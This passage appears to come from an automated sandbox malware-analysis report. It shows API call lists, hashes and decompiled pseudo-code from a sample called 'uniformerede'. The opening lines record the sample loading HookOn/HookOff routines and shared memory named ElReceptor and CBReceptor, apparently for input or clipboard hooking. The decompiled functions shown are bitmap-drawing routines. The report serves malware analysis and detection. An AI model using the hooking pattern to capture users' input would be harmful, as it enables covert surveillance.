                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,HookOn), ref: 0047656B
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,HookOff), ref: 0047657C
                                                                                                                                                                                                                            • CreateFileMappingA.KERNEL32 ref: 004765B5
                                                                                                                                                                                                                            • MapViewOfFile.KERNEL32(?,00000002,00000000,00000000,00000000,000000FF,00000000,00000004,00000000,00000004,ElReceptor,00000000,HookOff,00000000,HookOn), ref: 004765E5
                                                                                                                                                                                                                            • CreateFileMappingA.KERNEL32 ref: 00476600
                                                                                                                                                                                                                            • MapViewOfFile.KERNEL32(?,00000002,00000000,00000000,00000000,000000FF,00000000,00000004,00000000,00000004,CBReceptor,?,00000002,00000000,00000000,00000000), ref: 00476630
                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00476697), ref: 00476652
                                                                                                                                                                                                                            • UnmapViewOfFile.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00476697), ref: 00476661
                                                                                                                                                                                                                            • UnmapViewOfFile.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00476697), ref: 0047666A
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00476697), ref: 00476673
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0047667C
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: File$View$Library$AddressCloseCreateHandleLoadMappingProcUnmap$Free
                                                                                                                                                                                                                            • String ID: CBReceptor$ElReceptor$HookOff$HookOn
                                                                                                                                                                                                                            • API String ID: 2408097603-676361416
                                                                                                                                                                                                                            • Opcode ID: 72e6fa980a1183395053bc88635b47a3b0f05e5c8ec6e6a6430965d3f8941275
                                                                                                                                                                                                                            • Instruction ID: bf3a7df91238c31d5b8269ba8868fe670cbdf993f40fb106005159f73c36cbb0
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 72e6fa980a1183395053bc88635b47a3b0f05e5c8ec6e6a6430965d3f8941275
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 534163B0700B00ABD730BBB6DD86B5677E5AB44708F91453FF649AB6D1CA79B8048B0C
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0042A510 Relevance: 28.4, APIs: 14, Strings: 2, Instructions: 351COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 65%
                                                                                                                                                                                                                            			E0042A510(intOrPtr __eax, void* __ebx, void* __ecx, intOrPtr* __edx, void* __edi, void* __esi, char* _a4) {
				intOrPtr _v8;
				intOrPtr* _v12;
				void* _v16;
				struct HDC__* _v20;
				char _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v37;
				intOrPtr _v44;
				void* _v48;
				struct HDC__* _v52;
				intOrPtr _v56;
				intOrPtr* _v60;
				intOrPtr* _v64;
				short _v66;
				short _v68;
				signed short _v70;
				signed short _v72;
				void* _v76;
				intOrPtr _v172;
				char _v174;
				intOrPtr _t150;
				signed int _t160;
				intOrPtr _t163;
				void* _t166;
				void* _t174;
				void* _t183;
				signed int _t188;
				intOrPtr _t189;
				struct HDC__* _t190;
				struct HDC__* _t204;
				signed int _t208;
				signed short _t214;
				intOrPtr _t241;
				intOrPtr* _t245;
				intOrPtr _t251;
				intOrPtr _t289;
				intOrPtr _t290;
				intOrPtr _t295;
				signed int _t297;
				signed int _t317;
				void* _t319;
				void* _t320;
				signed int _t321;
				void* _t322;
				void* _t323;
				void* _t324;
				intOrPtr _t325;

				_t316 = __edi;
				_t323 = _t324;
				_t325 = _t324 + 0xffffff54;
				_t319 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_v52 = 0;
				_v44 = 0;
				_v60 = 0;
				 *((intOrPtr*)( *_v12 + 0xc))(__edi, __esi, __ebx, _t322);
				_v37 = _v36 == 0xc;
				if(_v37 != 0) {
					_v36 = 0x28;
				}
				_v28 = E0040275C(_v36 + 0x40c);
				_v64 = _v28;
				_push(_t323);
				_push(0x42aa2d);
				_push( *[fs:edx]);
				 *[fs:edx] = _t325;
				_push(_t323);
				_push(0x42aa00);
				_push( *[fs:edx]);
				 *[fs:edx] = _t325;
				if(_v37 == 0) {
					 *((intOrPtr*)( *_v12 + 0xc))();
					_t320 = _t319 - _v36;
					_t150 =  *((intOrPtr*)(_v64 + 0x10));
					if(_t150 != 3 && _t150 != 0) {
						_v60 = E00403BBC(1);
						if(_a4 == 0) {
							E004032B4( &_v174, 0xe);
							_v174 = 0x4d42;
							_v172 = _v36 + _t320;
							_a4 =  &_v174;
						}
						 *((intOrPtr*)( *_v60 + 0x10))();
						 *((intOrPtr*)( *_v60 + 0x10))();
						 *((intOrPtr*)( *_v60 + 0x10))();
						E0041D93C(_v60,  *_v60, _v12, _t316, _t320, _t320, 0);
						 *((intOrPtr*)( *_v60 + 0x14))();
						_v12 = _v60;
					}
				} else {
					 *((intOrPtr*)( *_v12 + 0xc))();
					_t251 = _v64;
					E004032B4(_t251, 0x28);
					_t241 = _t251;
					 *(_t241 + 4) = _v72 & 0x0000ffff;
					 *(_t241 + 8) = _v70 & 0x0000ffff;
					 *((short*)(_t241 + 0xc)) = _v68;
					 *((short*)(_t241 + 0xe)) = _v66;
					_t320 = _t319 - 0xc;
				}
				_t245 = _v64;
				 *_t245 = _v36;
				_v32 = _v28 + _v36;
				if( *((short*)(_t245 + 0xc)) != 1) {
					E00425F40();
				}
				if(_v36 == 0x28) {
					_t214 =  *(_t245 + 0xe);
					if(_t214 == 0x10 || _t214 == 0x20) {
						if( *((intOrPtr*)(_t245 + 0x10)) == 3) {
							E0041D8CC(_v12, 0xc, _v32);
							_v32 = _v32 + 0xc;
							_t320 = _t320 - 0xc;
						}
					}
				}
				if( *(_t245 + 0x20) == 0) {
					 *(_t245 + 0x20) = E004261D0( *(_t245 + 0xe));
				}
				_t317 = _v37 & 0x000000ff;
				_t257 =  *(_t245 + 0x20) * 0;
				E0041D8CC(_v12,  *(_t245 + 0x20) * 0, _v32);
				_t321 = _t320 -  *(_t245 + 0x20) * 0;
				if( *(_t245 + 0x14) == 0) {
					_t297 =  *(_t245 + 0xe) & 0x0000ffff;
					_t208 = E004261F0( *((intOrPtr*)(_t245 + 4)), 0x20, _t297);
					asm("cdq");
					_t257 = _t208 * (( *(_t245 + 8) ^ _t297) - _t297);
					 *(_t245 + 0x14) = _t208 * (( *(_t245 + 8) ^ _t297) - _t297);
				}
				_t160 =  *(_t245 + 0x14);
				if(_t321 > _t160) {
					_t321 = _t160;
				}
				if(_v37 != 0) {
					_t160 = E00426498(_v32);
				}
				_push(0);
				L00407638();
				_v16 = E00426060(_t160);
				_push(_t323);
				_push(0x42a97b);
				_push( *[fs:edx]);
				 *[fs:edx] = _t325;
				_t163 =  *((intOrPtr*)(_v64 + 0x10));
				if(_t163 == 0 || _t163 == 3) {
					if( *0x49b620 == 0) {
						_push(0);
						_push(0);
						_push( &_v24);
						_push(0);
						_push(_v28);
						_t166 = _v16;
						_push(_t166);
						L004072E8();
						_v44 = _t166;
						if(_v44 == 0 || _v24 == 0) {
							if(GetLastError() != 0) {
								E0040E79C(_t245, _t257, _t317, _t321);
							} else {
								E00425F40();
							}
						}
						_push(_t323);
						_push( *[fs:eax]);
						 *[fs:eax] = _t325;
						E0041D8CC(_v12, _t321, _v24);
						_pop(_t289);
						 *[fs:eax] = _t289;
						_t290 = 0x42a94a;
						 *[fs:eax] = _t290;
						_push(0x42a982);
						_t174 = _v16;
						_push(_t174);
						_push(0);
						L00407888();
						return _t174;
					} else {
						goto L27;
					}
				} else {
					L27:
					_v20 = 0;
					_v24 = E0040275C(_t321);
					_push(_t323);
					_push(0x42a8e3);
					_push( *[fs:edx]);
					 *[fs:edx] = _t325;
					_t263 = _t321;
					E0041D8CC(_v12, _t321, _v24);
					_push(_v16);
					L004072E0();
					_v20 = E00426060(_v16);
					_push(1);
					_push(1);
					_t183 = _v16;
					_push(_t183);
					L004072D8();
					_v48 = SelectObject(_v20, _t183);
					_v56 = 0;
					_t188 =  *(_v64 + 0x20);
					if(_t188 > 0) {
						_t263 = _t188;
						_v52 = E00426750(0, _t188);
						_push(0);
						_push(_v52);
						_t204 = _v20;
						_push(_t204);
						L00407440();
						_v56 = _t204;
						_push(_v20);
						L00407418();
					}
					_push(_t323);
					_push(0x42a8b7);
					_push( *[fs:edx]);
					 *[fs:edx] = _t325;
					_push(0);
					_t189 = _v28;
					_push(_t189);
					_push(_v24);
					_push(4);
					_push(_t189);
					_t190 = _v20;
					_push(_t190);
					L004072F0();
					_v44 = _t190;
					if(_v44 == 0) {
						if(GetLastError() != 0) {
							E0040E79C(_t245, _t263, _t317, _t321);
						} else {
							E00425F40();
						}
					}
					_pop(_t295);
					 *[fs:eax] = _t295;
					_push(0x42a8be);
					if(_v56 != 0) {
						_push(0xffffffff);
						_push(_v56);
						_push(_v20);
						L00407440();
					}
					return DeleteObject(SelectObject(_v20, _v48));
				}
			}




















































                                                                                                                                                                                                                            0x0042a510
                                                                                                                                                                                                                            0x0042a511
                                                                                                                                                                                                                            0x0042a513
                                                                                                                                                                                                                            0x0042a51c
                                                                                                                                                                                                                            0x0042a51e
                                                                                                                                                                                                                            0x0042a521
                                                                                                                                                                                                                            0x0042a526
                                                                                                                                                                                                                            0x0042a52b
                                                                                                                                                                                                                            0x0042a530
                                                                                                                                                                                                                            0x0042a540
                                                                                                                                                                                                                            0x0042a547
                                                                                                                                                                                                                            0x0042a54f
                                                                                                                                                                                                                            0x0042a551
                                                                                                                                                                                                                            0x0042a551
                                                                                                                                                                                                                            0x0042a568
                                                                                                                                                                                                                            0x0042a56e
                                                                                                                                                                                                                            0x0042a573
                                                                                                                                                                                                                            0x0042a574
                                                                                                                                                                                                                            0x0042a579
                                                                                                                                                                                                                            0x0042a57c
                                                                                                                                                                                                                            0x0042a581
                                                                                                                                                                                                                            0x0042a582
                                                                                                                                                                                                                            0x0042a587
                                                                                                                                                                                                                            0x0042a58a
                                                                                                                                                                                                                            0x0042a591
                                                                                                                                                                                                                            0x0042a5f0
                                                                                                                                                                                                                            0x0042a5f3
                                                                                                                                                                                                                            0x0042a5f9
                                                                                                                                                                                                                            0x0042a5ff
                                                                                                                                                                                                                            0x0042a619
                                                                                                                                                                                                                            0x0042a620
                                                                                                                                                                                                                            0x0042a62f
                                                                                                                                                                                                                            0x0042a634
                                                                                                                                                                                                                            0x0042a642
                                                                                                                                                                                                                            0x0042a64e
                                                                                                                                                                                                                            0x0042a64e
                                                                                                                                                                                                                            0x0042a65e
                                                                                                                                                                                                                            0x0042a66e
                                                                                                                                                                                                                            0x0042a682
                                                                                                                                                                                                                            0x0042a691
                                                                                                                                                                                                                            0x0042a6a3
                                                                                                                                                                                                                            0x0042a6a9
                                                                                                                                                                                                                            0x0042a6a9
                                                                                                                                                                                                                            0x0042a593
                                                                                                                                                                                                                            0x0042a5a3
                                                                                                                                                                                                                            0x0042a5a6
                                                                                                                                                                                                                            0x0042a5b2
                                                                                                                                                                                                                            0x0042a5b7
                                                                                                                                                                                                                            0x0042a5bd
                                                                                                                                                                                                                            0x0042a5c4
                                                                                                                                                                                                                            0x0042a5cb
                                                                                                                                                                                                                            0x0042a5d3
                                                                                                                                                                                                                            0x0042a5d7
                                                                                                                                                                                                                            0x0042a5d7
                                                                                                                                                                                                                            0x0042a6ac
                                                                                                                                                                                                                            0x0042a6b2
                                                                                                                                                                                                                            0x0042a6ba
                                                                                                                                                                                                                            0x0042a6c2
                                                                                                                                                                                                                            0x0042a6c4
                                                                                                                                                                                                                            0x0042a6c4
                                                                                                                                                                                                                            0x0042a6cd
                                                                                                                                                                                                                            0x0042a6cf
                                                                                                                                                                                                                            0x0042a6d7
                                                                                                                                                                                                                            0x0042a6e3
                                                                                                                                                                                                                            0x0042a6f0
                                                                                                                                                                                                                            0x0042a6f5
                                                                                                                                                                                                                            0x0042a6f9
                                                                                                                                                                                                                            0x0042a6f9
                                                                                                                                                                                                                            0x0042a6e3
                                                                                                                                                                                                                            0x0042a6d7
                                                                                                                                                                                                                            0x0042a700
                                                                                                                                                                                                                            0x0042a70b
                                                                                                                                                                                                                            0x0042a70b
                                                                                                                                                                                                                            0x0042a711
                                                                                                                                                                                                                            0x0042a71d
                                                                                                                                                                                                                            0x0042a726
                                                                                                                                                                                                                            0x0042a738
                                                                                                                                                                                                                            0x0042a73e
                                                                                                                                                                                                                            0x0042a740
                                                                                                                                                                                                                            0x0042a74c
                                                                                                                                                                                                                            0x0042a756
                                                                                                                                                                                                                            0x0042a75b
                                                                                                                                                                                                                            0x0042a75e
                                                                                                                                                                                                                            0x0042a75e
                                                                                                                                                                                                                            0x0042a761
                                                                                                                                                                                                                            0x0042a766
                                                                                                                                                                                                                            0x0042a768
                                                                                                                                                                                                                            0x0042a768
                                                                                                                                                                                                                            0x0042a76e
                                                                                                                                                                                                                            0x0042a773
                                                                                                                                                                                                                            0x0042a773
                                                                                                                                                                                                                            0x0042a778
                                                                                                                                                                                                                            0x0042a77a
                                                                                                                                                                                                                            0x0042a784
                                                                                                                                                                                                                            0x0042a789
                                                                                                                                                                                                                            0x0042a78a
                                                                                                                                                                                                                            0x0042a78f
                                                                                                                                                                                                                            0x0042a792
                                                                                                                                                                                                                            0x0042a798
                                                                                                                                                                                                                            0x0042a79d
                                                                                                                                                                                                                            0x0042a7ab
                                                                                                                                                                                                                            0x0042a8ea
                                                                                                                                                                                                                            0x0042a8ec
                                                                                                                                                                                                                            0x0042a8f1
                                                                                                                                                                                                                            0x0042a8f2
                                                                                                                                                                                                                            0x0042a8f7
                                                                                                                                                                                                                            0x0042a8f8
                                                                                                                                                                                                                            0x0042a8fb
                                                                                                                                                                                                                            0x0042a8fc
                                                                                                                                                                                                                            0x0042a901
                                                                                                                                                                                                                            0x0042a908
                                                                                                                                                                                                                            0x0042a917
                                                                                                                                                                                                                            0x0042a920
                                                                                                                                                                                                                            0x0042a919
                                                                                                                                                                                                                            0x0042a919
                                                                                                                                                                                                                            0x0042a919
                                                                                                                                                                                                                            0x0042a917
                                                                                                                                                                                                                            0x0042a927
                                                                                                                                                                                                                            0x0042a92d
                                                                                                                                                                                                                            0x0042a930
                                                                                                                                                                                                                            0x0042a93b
                                                                                                                                                                                                                            0x0042a942
                                                                                                                                                                                                                            0x0042a945
                                                                                                                                                                                                                            0x0042a964
                                                                                                                                                                                                                            0x0042a967
                                                                                                                                                                                                                            0x0042a96a
                                                                                                                                                                                                                            0x0042a96f
                                                                                                                                                                                                                            0x0042a972
                                                                                                                                                                                                                            0x0042a973
                                                                                                                                                                                                                            0x0042a975
                                                                                                                                                                                                                            0x0042a97a
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0042a7b1
                                                                                                                                                                                                                            0x0042a7b1
                                                                                                                                                                                                                            0x0042a7b3
                                                                                                                                                                                                                            0x0042a7bd
                                                                                                                                                                                                                            0x0042a7c2
                                                                                                                                                                                                                            0x0042a7c3
                                                                                                                                                                                                                            0x0042a7c8
                                                                                                                                                                                                                            0x0042a7cb
                                                                                                                                                                                                                            0x0042a7d1
                                                                                                                                                                                                                            0x0042a7d6
                                                                                                                                                                                                                            0x0042a7de
                                                                                                                                                                                                                            0x0042a7df
                                                                                                                                                                                                                            0x0042a7e9
                                                                                                                                                                                                                            0x0042a7ec
                                                                                                                                                                                                                            0x0042a7ee
                                                                                                                                                                                                                            0x0042a7f0
                                                                                                                                                                                                                            0x0042a7f3
                                                                                                                                                                                                                            0x0042a7f4
                                                                                                                                                                                                                            0x0042a803
                                                                                                                                                                                                                            0x0042a808
                                                                                                                                                                                                                            0x0042a80e
                                                                                                                                                                                                                            0x0042a813
                                                                                                                                                                                                                            0x0042a815
                                                                                                                                                                                                                            0x0042a821
                                                                                                                                                                                                                            0x0042a824
                                                                                                                                                                                                                            0x0042a829
                                                                                                                                                                                                                            0x0042a82a
                                                                                                                                                                                                                            0x0042a82d
                                                                                                                                                                                                                            0x0042a82e
                                                                                                                                                                                                                            0x0042a833
                                                                                                                                                                                                                            0x0042a839
                                                                                                                                                                                                                            0x0042a83a
                                                                                                                                                                                                                            0x0042a83a
                                                                                                                                                                                                                            0x0042a841
                                                                                                                                                                                                                            0x0042a842
                                                                                                                                                                                                                            0x0042a847
                                                                                                                                                                                                                            0x0042a84a
                                                                                                                                                                                                                            0x0042a84d
                                                                                                                                                                                                                            0x0042a84f
                                                                                                                                                                                                                            0x0042a852
                                                                                                                                                                                                                            0x0042a856
                                                                                                                                                                                                                            0x0042a857
                                                                                                                                                                                                                            0x0042a859
                                                                                                                                                                                                                            0x0042a85a
                                                                                                                                                                                                                            0x0042a85d
                                                                                                                                                                                                                            0x0042a85e
                                                                                                                                                                                                                            0x0042a863
                                                                                                                                                                                                                            0x0042a86a
                                                                                                                                                                                                                            0x0042a873
                                                                                                                                                                                                                            0x0042a87c
                                                                                                                                                                                                                            0x0042a875
                                                                                                                                                                                                                            0x0042a875
                                                                                                                                                                                                                            0x0042a875
                                                                                                                                                                                                                            0x0042a873
                                                                                                                                                                                                                            0x0042a883
                                                                                                                                                                                                                            0x0042a886
                                                                                                                                                                                                                            0x0042a889
                                                                                                                                                                                                                            0x0042a892
                                                                                                                                                                                                                            0x0042a894
                                                                                                                                                                                                                            0x0042a899
                                                                                                                                                                                                                            0x0042a89d
                                                                                                                                                                                                                            0x0042a89e
                                                                                                                                                                                                                            0x0042a89e
                                                                                                                                                                                                                            0x0042a8b6
                                                                                                                                                                                                                            0x0042a8b6

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • 73C9AC50.USER32(00000000,?,00000000,0042AA2D,?,?), ref: 0042A77A
                                                                                                                                                                                                                            • 73C9A590.GDI32(00000001,00000000,0042A8E3,?,00000000,0042A97B,?,00000000,?,00000000,0042AA2D,?,?), ref: 0042A7DF
                                                                                                                                                                                                                            • 73C9A520.GDI32(00000001,00000001,00000001,00000001,00000000,0042A8E3,?,00000000,0042A97B,?,00000000,?,00000000,0042AA2D,?,?), ref: 0042A7F4
                                                                                                                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 0042A7FE
                                                                                                                                                                                                                            • 73C9B410.GDI32(?,?,00000000,?,00000000,00000001,00000001,00000001,00000001,00000000,0042A8E3,?,00000000,0042A97B,?,00000000), ref: 0042A82E
                                                                                                                                                                                                                            • 73C9B150.GDI32(?,?,?,00000000,?,00000000,00000001,00000001,00000001,00000001,00000000,0042A8E3,?,00000000,0042A97B), ref: 0042A83A
                                                                                                                                                                                                                            • 73C9A7F0.GDI32(?,?,00000004,00000000,?,00000000,00000000,0042A8B7,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 0042A85E
                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,00000004,00000000,?,00000000,00000000,0042A8B7,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 0042A86C
                                                                                                                                                                                                                            • 73C9B410.GDI32(?,00000000,000000FF,0042A8BE,00000000,?,00000000,00000000,0042A8B7,?,?,00000000,00000001,00000001,00000001,00000001), ref: 0042A89E
                                                                                                                                                                                                                            • SelectObject.GDI32(?,?), ref: 0042A8AB
                                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 0042A8B1
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Object$B410Select$A520A590B150DeleteErrorLast
                                                                                                                                                                                                                            • String ID: ($BM
                                                                                                                                                                                                                            • API String ID: 3415089252-2980357723
                                                                                                                                                                                                                            • Opcode ID: 496f69271fb9ccee439b3da71489c37b304fc4bf0672b7fc97fcd75c0970043d
                                                                                                                                                                                                                            • Instruction ID: 25b6b903fc63a4d1ab3304e11741f41bc99333438c5c48279b365a0d6610163c
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 496f69271fb9ccee439b3da71489c37b304fc4bf0672b7fc97fcd75c0970043d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A8D14C74F002189FDB04EFA9D885BAEBBB5FF48304F54846AE904E7391D7389851CB69
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00429C0C Relevance: 21.2, APIs: 14, Instructions: 217windowCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 71%
                                                                                                                                                                                                                            			E00429C0C(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				void* _v12;
				char _v13;
				struct tagPOINT _v21;
				struct HDC__* _v28;
				void* _v32;
				intOrPtr _t78;
				struct HDC__* _t80;
				signed int _t82;
				signed int _t83;
				signed int _t84;
				char _t85;
				void* _t92;
				struct HDC__* _t115;
				void* _t136;
				struct HDC__* _t160;
				intOrPtr* _t164;
				intOrPtr _t172;
				intOrPtr _t176;
				intOrPtr _t178;
				intOrPtr _t180;
				int* _t184;
				intOrPtr _t186;
				void* _t188;
				void* _t189;
				intOrPtr _t190;

				_t165 = __ecx;
				_t188 = _t189;
				_t190 = _t189 + 0xffffffe4;
				_t184 = __ecx;
				_v8 = __edx;
				_t164 = __eax;
				_t186 =  *((intOrPtr*)(__eax + 0x28));
				_t172 =  *0x429e58; // 0xf
				E00425D3C(_v8, __ecx, _t172);
				E0042A288(_t164);
				_v12 = 0;
				_v13 = 0;
				_t78 =  *((intOrPtr*)(_t186 + 0x10));
				if(_t78 != 0) {
					_push(0xffffffff);
					_push(_t78);
					_t160 =  *(_v8 + 4);
					_push(_t160);
					L00407440();
					_v12 = _t160;
					_push( *(_v8 + 4));
					L00407418();
					_v13 = 1;
				}
				_push(0xc);
				_t80 =  *(_v8 + 4);
				_push(_t80);
				L00407380();
				_push(_t80);
				_push(0xe);
				_t82 =  *(_v8 + 4);
				L00407380();
				_t83 = _t82;
				_t84 = _t83 * _t82;
				if(_t84 > 8) {
					L4:
					_t85 = 0;
				} else {
					_t165 =  *(_t186 + 0x28) & 0x0000ffff;
					if(_t84 < ( *(_t186 + 0x2a) & 0x0000ffff) * ( *(_t186 + 0x28) & 0x0000ffff)) {
						_t85 = 1;
					} else {
						goto L4;
					}
				}
				if(_t85 == 0) {
					if(E00429F98(_t164) == 0) {
						SetStretchBltMode(E00425C68(_v8), 3);
					}
				} else {
					GetBrushOrgEx( *(_v8 + 4),  &_v21);
					SetStretchBltMode( *(_v8 + 4), 4);
					SetBrushOrgEx( *(_v8 + 4), _v21, _v21.y,  &_v21);
				}
				_push(_t188);
				_push(0x429e48);
				_push( *[fs:eax]);
				 *[fs:eax] = _t190;
				if( *((intOrPtr*)( *_t164 + 0x28))() != 0) {
					E0042A228(_t164, _t165);
				}
				_t92 = E00429EDC(_t164);
				_t176 =  *0x429e58; // 0xf
				E00425D3C(_t92, _t165, _t176);
				if( *((intOrPtr*)( *_t164 + 0x28))() == 0) {
					StretchBlt( *(_v8 + 4),  *_t184, _t184[1], _t184[2] -  *_t184, _t184[3] - _t184[1],  *(E00429EDC(_t164) + 4), 0, 0,  *(_t186 + 0x1c),  *(_t186 + 0x20),  *(_v8 + 0x20));
					_pop(_t178);
					 *[fs:eax] = _t178;
					_push(0x429e4f);
					if(_v13 != 0) {
						_push(0xffffffff);
						_push(_v12);
						_t115 =  *(_v8 + 4);
						_push(_t115);
						L00407440();
						return _t115;
					}
					return 0;
				} else {
					_v32 = 0;
					_v28 = 0;
					_push(_t188);
					_push(0x429ddd);
					_push( *[fs:eax]);
					 *[fs:eax] = _t190;
					L004072E0();
					_v28 = E00426060(0);
					_v32 = SelectObject(_v28,  *(_t186 + 0xc));
					E00426204( *(_v8 + 4), _t164, _t184[1],  *_t184, _t184, _t186, 0, 0, _v28,  *(_t186 + 0x20),  *(_t186 + 0x1c), 0, 0,  *(E00429EDC(_t164) + 4), _t184[3] - _t184[1], _t184[2] -  *_t184);
					_t136 = 0;
					_t180 = 0;
					 *[fs:eax] = _t180;
					_push(0x429e22);
					if(_v32 != 0) {
						_t136 = SelectObject(_v28, _v32);
					}
					if(_v28 != 0) {
						return DeleteDC(_v28);
					}
					return _t136;
				}
			}





























                                                                                                                                                                                                                            0x00429c0c
                                                                                                                                                                                                                            0x00429c0d
                                                                                                                                                                                                                            0x00429c0f
                                                                                                                                                                                                                            0x00429c15
                                                                                                                                                                                                                            0x00429c17
                                                                                                                                                                                                                            0x00429c1a
                                                                                                                                                                                                                            0x00429c1c
                                                                                                                                                                                                                            0x00429c1f
                                                                                                                                                                                                                            0x00429c28
                                                                                                                                                                                                                            0x00429c2f
                                                                                                                                                                                                                            0x00429c36
                                                                                                                                                                                                                            0x00429c39
                                                                                                                                                                                                                            0x00429c3d
                                                                                                                                                                                                                            0x00429c42
                                                                                                                                                                                                                            0x00429c44
                                                                                                                                                                                                                            0x00429c46
                                                                                                                                                                                                                            0x00429c4a
                                                                                                                                                                                                                            0x00429c4d
                                                                                                                                                                                                                            0x00429c4e
                                                                                                                                                                                                                            0x00429c53
                                                                                                                                                                                                                            0x00429c5c
                                                                                                                                                                                                                            0x00429c5d
                                                                                                                                                                                                                            0x00429c62
                                                                                                                                                                                                                            0x00429c62
                                                                                                                                                                                                                            0x00429c66
                                                                                                                                                                                                                            0x00429c6b
                                                                                                                                                                                                                            0x00429c6e
                                                                                                                                                                                                                            0x00429c6f
                                                                                                                                                                                                                            0x00429c74
                                                                                                                                                                                                                            0x00429c75
                                                                                                                                                                                                                            0x00429c7a
                                                                                                                                                                                                                            0x00429c7e
                                                                                                                                                                                                                            0x00429c85
                                                                                                                                                                                                                            0x00429c86
                                                                                                                                                                                                                            0x00429c8b
                                                                                                                                                                                                                            0x00429c9c
                                                                                                                                                                                                                            0x00429c9c
                                                                                                                                                                                                                            0x00429c8d
                                                                                                                                                                                                                            0x00429c91
                                                                                                                                                                                                                            0x00429c9a
                                                                                                                                                                                                                            0x00429ca0
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00429c9a
                                                                                                                                                                                                                            0x00429ca4
                                                                                                                                                                                                                            0x00429ce7
                                                                                                                                                                                                                            0x00429cf4
                                                                                                                                                                                                                            0x00429cf4
                                                                                                                                                                                                                            0x00429ca6
                                                                                                                                                                                                                            0x00429cb1
                                                                                                                                                                                                                            0x00429cbf
                                                                                                                                                                                                                            0x00429cd7
                                                                                                                                                                                                                            0x00429cd7
                                                                                                                                                                                                                            0x00429cfb
                                                                                                                                                                                                                            0x00429cfc
                                                                                                                                                                                                                            0x00429d01
                                                                                                                                                                                                                            0x00429d04
                                                                                                                                                                                                                            0x00429d10
                                                                                                                                                                                                                            0x00429d14
                                                                                                                                                                                                                            0x00429d14
                                                                                                                                                                                                                            0x00429d1b
                                                                                                                                                                                                                            0x00429d20
                                                                                                                                                                                                                            0x00429d26
                                                                                                                                                                                                                            0x00429d34
                                                                                                                                                                                                                            0x00429e1d
                                                                                                                                                                                                                            0x00429e24
                                                                                                                                                                                                                            0x00429e27
                                                                                                                                                                                                                            0x00429e2a
                                                                                                                                                                                                                            0x00429e33
                                                                                                                                                                                                                            0x00429e35
                                                                                                                                                                                                                            0x00429e3a
                                                                                                                                                                                                                            0x00429e3e
                                                                                                                                                                                                                            0x00429e41
                                                                                                                                                                                                                            0x00429e42
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00429e42
                                                                                                                                                                                                                            0x00429e47
                                                                                                                                                                                                                            0x00429d3a
                                                                                                                                                                                                                            0x00429d3c
                                                                                                                                                                                                                            0x00429d41
                                                                                                                                                                                                                            0x00429d46
                                                                                                                                                                                                                            0x00429d47
                                                                                                                                                                                                                            0x00429d4c
                                                                                                                                                                                                                            0x00429d4f
